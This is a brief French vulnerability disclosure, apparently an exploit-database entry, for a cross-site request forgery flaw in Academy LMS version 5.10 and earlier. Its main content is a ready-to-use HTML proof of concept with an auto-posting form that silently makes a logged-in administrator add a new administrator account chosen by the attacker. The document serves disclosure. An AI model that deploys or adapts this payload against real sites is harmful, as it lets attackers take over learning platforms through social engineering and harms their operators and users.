
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS est une application où les utilisateurs peuvent créer et promouvoir des cours. La possibilité d'ajouter un nouvel utilisateur administratif est vulnérable aux CSRF, ce qui permet d'utiliser l'ingénierie sociale pour obtenir un accès administrateur sur la plateforme.
#Preuve de concept (POC) La première étape de notre preuve de concept consiste à s'authentifier sur la plateforme avec un utilisateur administratif.
Ensuite, il suffit d'accéder à la page contenant le code d'exploitation de la vulnérabilité et de constater qu'un nouvel utilisateur administratif a été ajouté au système.
Code utilisé dans l'exploit :
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>